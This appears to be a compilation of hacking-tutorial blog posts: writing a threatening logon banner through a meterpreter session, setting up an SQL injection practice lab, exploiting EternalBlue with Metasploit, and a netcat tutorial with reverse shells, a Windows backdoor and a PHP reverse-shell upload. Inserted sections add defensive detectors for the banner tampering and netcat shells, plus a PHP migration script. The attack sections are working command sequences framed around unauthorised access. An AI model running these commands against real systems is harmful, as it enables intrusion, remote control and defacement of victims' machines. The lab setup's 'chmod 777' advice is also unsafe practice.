Hack Legal Notice Caption of Remote PC

Registry keys play an important role in the operating system. An attacker makes use of the legal notice registry values to place a threatening message on the targeted system, so that once the system boots up the user reads a message such as “your system has been hacked”, which appears before the login screen.

In this article we show how an attacker sends a threatening message to the logon screen of the targeted users.

Let’s start

Attacker : Kali Linux

Target: Windows 7

Read our previous article on how to hack Windows 7 and get a meterpreter session on the victim. Meterpreter offers many post-exploitation options; now type the following command to list the registry key of interest on the victim’s system.

meterpreter > reg enumkey -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System

From the screenshot you can observe that it contains 2 subkeys (Audit, UIPI) and 18 different values. The highlighted box shows our targeted values:

  1. legalnoticecaption
  2. legalnoticetext

Now type another command to assign the value of legalnoticecaption, which provides the title or heading of the message shown on the logon screen.

meterpreter > reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System -v legalnoticecaption -d "IMPORTANT MESSAGE"

From the screenshot you can see that our registry value has been set successfully.

Now type one more command to place the warning message on the targeted system by assigning the value of legalnoticetext, which displays your message on the logon screen of the victim’s system.

meterpreter > reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System -v legalnoticetext -d "PWNED BY RAJ CHANDEL"

From the screenshot you can see that this registry value has also been set successfully.

Here -k denotes the key, -v the value name and -d the data to write.

Now when the victim starts his system he will see our message on the logon screen, as shown in the given screenshot.
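Added example, not part of the original article: the defender’s side of this technique. It runs over constructed Sysmon Event ID 13 (RegistryEvent, Value Set) records and reports which process wrote legalnoticecaption or legalnoticetext and what it wrote, skipping an allowlisted image such as the Group Policy client. The flattened record layout, process paths and data are constructed, not real telemetry.

```python
# Values under HKLM\...\Policies\System that this article sets to show a message
# on the logon screen; a defender wants to know who writes them and with what.
LOGON_BANNER_VALUES = {"legalnoticecaption", "legalnoticetext"}
POLICIES_SYSTEM_KEY = r"\software\microsoft\windows\currentversion\policies\system"

def parse_sysmon_registry_event(line):
    """Parse one constructed, flattened Sysmon record ('Name: value' fields joined by '|')."""
    fields = {}
    for part in line.split("|"):
        name, _, value = part.partition(":")
        fields[name.strip()] = value.strip()
    return fields

def is_logon_banner_write(event):
    """True for a Sysmon Event ID 13 (RegistryEvent, Value Set) on either banner value,
    whatever letter case or hive alias (HKLM vs HKEY_LOCAL_MACHINE) the record uses."""
    if event.get("EventID") != "13":
        return False
    key, _, value_name = event.get("TargetObject", "").rpartition("\\")
    return value_name.lower() in LOGON_BANNER_VALUES and key.lower().endswith(POLICIES_SYSTEM_KEY)

def find_banner_tampering(lines, allowlist=()):
    """Return (writing process image, value name, data written) for each banner write
    whose process image is not allowlisted (e.g. the Group Policy client)."""
    allowed = {a.lower() for a in allowlist}
    findings = []
    for line in lines:
        ev = parse_sysmon_registry_event(line)
        if not is_logon_banner_write(ev) or ev.get("Image", "").lower() in allowed:
            continue
        findings.append((ev["Image"], ev["TargetObject"].rpartition("\\")[2], ev.get("Details", "")))
    return findings

# Constructed sample records (not real telemetry); the Details field holds the data written.
SAMPLE_EVENTS = [
    "EventID: 13 | Image: C:\\Windows\\System32\\svchost.exe | TargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA | Details: DWORD (0x00000001)",
    "EventID: 13 | Image: C:\\Windows\\Temp\\svc.exe | TargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\legalnoticecaption | Details: IMPORTANT MESSAGE",
    "EventID: 13 | Image: C:\\Windows\\Temp\\svc.exe | TargetObject: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText | Details: your system has been hacked",
    "EventID: 12 | Image: C:\\Windows\\Temp\\svc.exe | TargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\legalnoticetext",
]

if __name__ == "__main__":
    for image, name, data in find_banner_tampering(SAMPLE_EVENTS):
        print("logon banner value %s written by %s: %r" % (name, image, data))
```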

Try it yourself!!!

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

How to set up SQLi Lab in Kali

Hello everyone, with the joy of having a new Kali version, a few of us are having a hard time setting up the Dhakkan (Audi-1) SQLi series lab on our Kali machine.

So today we’ll learn how to set up the Dhakkan lab (one of the best labs I have seen for practising and understanding SQL injection) on our latest Kali machine.

Download from here

Q – Why is it not as simple as it was in older versions of Kali?

Ans – The latest version of Kali ships PHP 7.x, which no longer supports the old mysql_* functions; it supports the MySQLi functions instead.

The MySQLi extension (MySQL Improved) is a relational database driver used mainly in the PHP programming language.

So we have 2 ways to set it up:

  • Downgrade your PHP version to 5.x
  • Change the code of the original Dhakkan lab to make it work with the latest Kali.

We’ll change the code of the labs.

Q – How did I come to know that this was the issue?

Ans – When I set up my lab and browsed it, I saw that I was unable to set up the required database; see the screenshot below.

In the above screenshot look at the URL. So now I knew something was wrong in setup-db.php, so I tried to run this specific file on my Kali; see screenshot.

After googling the error I came to know that I had to replace mysql_connect() with mysqli_connect().

After making this change, when I ran setup.php again I came across a new error; see screenshot.

So I replaced mysql_query($sql) with mysqli_query($con, $sql).

($con is the connection link we made to our database.) If you don’t know PHP, don’t worry; simply replace mysql_query($sql) with mysqli_query($con, $sql).

So this is how I debugged the issue.

Now I am summarising the changes that I made and that you have to make to set up your lab.

Simply use Ctrl+F and the replace-all feature to make the changes quickly.

You have to make the changes in index.php of ALL lessons, in the other PHP files of the lessons, and in all PHP files present in the sql-connections folder.

(Or you can contact me to get the edited lab)

S.No  Replace                               Replace by
1     mysql_query($sql)                     mysqli_query($con, $sql)
2     mysql_error()                         mysqli_error($con)
3     mysql_fetch_array($result)            mysqli_fetch_array($result, MYSQLI_BOTH)
4     mysql_fetch_array($result1)           mysqli_fetch_array($result1, MYSQLI_BOTH)
5     mysql_connect($host,$dbuser,$dbpass)  mysqli_connect($host,$dbuser,$dbpass)
6     mysql_real_escape_string($value)      mysqli_real_escape_string($con, $value)
7     mysql_select_db($dbname, $con)        mysqli_select_db($con, $dbname)
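Added example, not part of the original post or of the lab: a script that applies the table above to the lab’s PHP files instead of Ctrl+F, generalising rows 3 and 4 to any result variable, and that reports any legacy mysql_* call the table does not cover so it is not silently left broken on PHP 7. The sample PHP snippet is constructed in the style of the lab’s connection code, not taken from the lab.

```python
import pathlib
import re

# One (pattern, replacement) per table row; rows 3/4 are merged to accept any result
# variable and row 5 keeps whatever arguments the lab passes to mysql_connect().
MYSQL_TO_MYSQLI = [
    (r"mysql_query\(\s*(\$\w+)\s*\)", r"mysqli_query($con, \1)"),
    (r"mysql_error\(\s*\)", r"mysqli_error($con)"),
    (r"mysql_fetch_array\(\s*(\$\w+)\s*\)", r"mysqli_fetch_array(\1, MYSQLI_BOTH)"),
    (r"mysql_connect\(", r"mysqli_connect("),
    (r"mysql_real_escape_string\(\s*(\$\w+)\s*\)", r"mysqli_real_escape_string($con, \1)"),
    (r"mysql_select_db\(\s*(\$\w+)\s*,\s*(\$\w+)\s*\)", r"mysqli_select_db(\2, \1)"),
]

def migrate_mysql_to_mysqli(php_source):
    """Apply the table's replacements to one PHP source string."""
    for pattern, replacement in MYSQL_TO_MYSQLI:
        php_source = re.sub(pattern, replacement, php_source)
    return php_source

def remaining_mysql_calls(php_source):
    """Legacy mysql_* calls still present, so a lesson using a function outside the
    table is reported instead of silently left broken on PHP 7."""
    return sorted(set(re.findall(r"\bmysql_\w+\s*\(", php_source)))

def migrate_tree(root):
    """Rewrite every .php file below root in place; return {path: leftover calls}."""
    leftovers = {}
    for path in pathlib.Path(root).rglob("*.php"):
        migrated = migrate_mysql_to_mysqli(path.read_text(encoding="utf-8", errors="replace"))
        path.write_text(migrated, encoding="utf-8")
        if remaining_mysql_calls(migrated):
            leftovers[str(path)] = remaining_mysql_calls(migrated)
    return leftovers

# Constructed snippet in the style of the lab's connection code (not the lab's own file).
SAMPLE_PHP = """<?php
$con = mysql_connect($host, $dbuser, $dbpass);
mysql_select_db($dbname, $con);
$id = mysql_real_escape_string($value);
$result = mysql_query($sql);
$row = mysql_fetch_array($result1);
if (!$row) { print(mysql_error()); }
$n = mysql_num_rows($result);
?>"""

if __name__ == "__main__":
    print(migrate_mysql_to_mysqli(SAMPLE_PHP))
    print("still legacy:", remaining_mysql_calls(migrate_mysql_to_mysqli(SAMPLE_PHP)))
```

Run migrate_tree("/var/www/html/sqli-labs") once the folder is in place; mysql_num_rows() in the sample is reported as a leftover because it is not in the table.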

After making the above changes, copy the complete sqli-labs folder into the /var/www/html folder of Kali.

Now open a Kali terminal and move to this folder with the command “cd /var/www/html”.

Now give permissions to the sqlilabs folder with the command “chmod 777 sqlilabs”.

Now move into the sqlilabs folder with the command “cd sqlilabs” and give permissions to all files and folders in it with the command “chmod 777 *”.

Now your lab is ready to use; you can access it in your browser at the IP of your Kali machine followed by /sqlilabs.

Click on “Setup/reset Database for labs”.

With the database set up, practise and enjoy, and use your skill to help organisations secure their apps and applications from hackers. Don’t test it on sites for which you don’t have written permission to do so. It is illegal; you may end up behind bars and ruin your career.

We are very thankful to Audi-1 (aka Dhakkan) for creating such an interesting and awesome environment for us to understand and practise SQL injection.

Author – Rinkish Khera is a Web Application security consultant who loves competitive coding, hacking and learning new things about technology.

Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool Corruption

This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with a mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that the overflow is well laid out to overwrite an SMBv1 buffer. The actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool-down period before the shells rain in again.

Let’s start!!!

Attacker: Kali Linux

Target: Windows 7

Open the terminal in your Kali Linux and type msfconsole to load the Metasploit framework.

msfconsole

use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.8

msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.21

msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) > exploit

From the screenshot you can see that we have got a meterpreter session after the buffer overflow was exploited by overwriting the SMBv1 buffer.

meterpreter > sysinfo

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

Netcat Tutorials for Beginners

From Wikipedia

In the field of hacking, one of the most utilised and powerful tools used by attackers is popularly known as “Netcat”, a computer networking utility for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can create almost any kind of connection its user could need and has a number of built-in capabilities.

Netcat is at the same time very easy and multipurpose; describing it is like trying to explain everything you can do with a Swiss Army knife.

For example:

  • Banner grabbing
  • Bind shell (backdoor)
  • Chatting
  • File uploading and downloading
  • Port scanning
  • Port knocking
  • Port forwarding
  • Show webserver HTTP file contents

There are many options inside netcat to enhance its function and effect, which you will see when you type nc -h in a terminal of Kali Linux. Before getting into its working details you must be aware that here we have used two systems, one as the attacker and the other as the target.

Let’s begin

Port Knocking

Open the terminal of your Kali Linux and type the following command, which contains the target’s IP and target port number.

nc 192.168.1.21 2222

When the given command is executed it reveals the hidden running service by knocking on the port; from the image below you can observe that port 2222 is open for SSH.

Reverse Shell

Mainly attackers use netcat as a backdoor for gaining unauthorised access to a target’s system; here the attacker activates a listening port (any port) after scanning a vulnerable target.

nc -lvp 4444

The above command waits for a reverse connection from the victim’s system.

In the given screenshot you can see that the running website suffers from an OS command injection vulnerability; now use nc -e /bin/bash 192.168.1.21 4444 to establish a connection between the victim’s and the attacker’s system, which allows unauthorised access by creating a backdoor.

Here you can see that we (the attacker) have successfully accessed the victim’s shell through netcat.

Netcat as a Backdoor

Download netcat.exe for Windows and type the following command on the Windows client:

nc.exe 192.168.1.21 4444 -e cmd.exe

From the given screenshot you can perceive that the attacker successfully connected with the Windows client through netcat, with the following listener running on the attacker’s system:

nc -lvp 4444

File Upload Exploitation

We will look at how an attacker can exploit a file upload vulnerability through a netcat shell. From the given image it is clear that the targeted webserver allows its client to upload an image.

For uploading we have used php-reverse-shell.php, which is a PHP backdoor, instead of an image. Open this web shell and edit the listener IP, i.e. your Kali Linux IP (192.168.1.21), then activate netcat using the following command, which waits to establish a reverse connection with the victim’s system.

nc -lvp 1234

Now upload your PHP backdoor to the web server and execute the file, which connects the victim’s system back to the attacker machine.

Hence you can see that the attacker successfully gained unauthorised access through the netcat shell.

HTTP Request

Use Netcat to fetch web page information from a webserver. With Netcat you can pull the full HTTP header, so you can see which particular site is running on the web server. Now type the following command, which makes a connection to port 80, then send the request line.

nc 192.168.1.11 80

OPTIONS / HTTP/1.0

From the screenshot you can read the details of the HTTP header of the targeted web site.

Port Scanning

Netcat can also scan TCP and UDP ports, hence it can be used in place of Nmap to tell us about the open and closed ports of the targeted IP.

The scan command takes the target IP and a port range; its options are:

  • -z: zero-I/O mode [used for scanning]
  • -w: timeout for connects and final net reads
  • -v: verbose
  • -l: listen mode, for inbound connects
  • -n: numeric-only IP addresses

From the resulting image you can see the open ports with their running services.

Chatting

Netcat can also be used for chatting between two systems. We need to set Netcat to listen on a specific port on one system and connect to that address and port from the other.

nc -lvp 5678

nc 192.168.1.21 5678

Hi

How are you

Visit www.hackingarticles.in

File Transfer

As you know, on Windows we have downloaded the netcat.exe file; here I have used it to upload a text file t.txt to the targeted system through a specific port.

nc 192.168.1.21 5555 < t.txt

Now the receiver can download the t.txt file by listening on the same port number, which establishes the connection between both systems.

nc -lvp 5555 > /root/Desktop/t.txt
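Added example, not part of the original tutorial: the defender’s view of the netcat command lines shown in the reverse shell, backdoor, port knocking and file transfer sections above. The classifier tells a reverse shell (-e plus a connect) from a bind shell (-e plus -l), a plain listener, a file send or receive (shell redirection) and a plain connect, and is run over constructed process-creation records; the executable name list, host names and records are constructed.

```python
import shlex

NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "nc.traditional", "nc.openbsd"}  # constructed list

def _basename(path):
    return path.strip("\"'").replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify_netcat(cmdline):
    """None if not netcat, else reverse_shell/bind_shell/listener/file_send/file_receive/connect."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes literal
    except ValueError:
        return None
    if not argv or _basename(argv[0]) not in NETCAT_NAMES:
        return None
    # Shell redirections are not netcat options, but they tell a file send from a receive.
    redirect_in = any(a.startswith("<") for a in argv[1:])
    redirect_out = any(a.startswith(">") for a in argv[1:])
    opts = [a.strip("\"'") for a in argv[1:] if a[0] not in "<>"]
    # -l may be bundled with other short flags, as in the -lvp used in this article.
    listening = any(o == "--listen" or (o.startswith("-") and not o.startswith("--") and "l" in o[1:])
                    for o in opts)
    # -e/-c (and ncat's --exec/--sh-exec) attach a program such as cmd.exe or /bin/bash.
    executes = any(o in ("-e", "-c", "--exec", "--sh-exec") or o.startswith(("--exec=", "--sh-exec="))
                   for o in opts)
    if executes:
        return "bind_shell" if listening else "reverse_shell"
    if listening:
        return "file_receive" if redirect_out else "listener"
    return "file_send" if redirect_in else "connect"

def find_netcat_shells(process_records):
    """(host, class, command line) for every constructed record that hands a shell to the network."""
    return [(host, classify_netcat(cmd), cmd) for host, cmd in process_records
            if classify_netcat(cmd) in ("reverse_shell", "bind_shell")]

# Constructed process-creation records (not real telemetry).
SAMPLE_PROCESSES = [
    ("web01", "nc -e /bin/bash 192.168.1.21 4444"),
    ("win7-lab", "C:\\Tools\\nc.exe 192.168.1.21 4444 -e cmd.exe"),
    ("kali", "nc -lvp 5555 > /root/Desktop/t.txt"),
    ("win7-lab", "nc.exe 192.168.1.21 5555 < t.txt"),
    ("kali", "nc 192.168.1.21 2222"),
    ("web01", "ls -l /var/www/html"),
]

if __name__ == "__main__":
    for host, kind, cmd in find_netcat_shells(SAMPLE_PROCESSES):
        print("%s: %s via %r" % (host, kind, cmd))
```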

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.
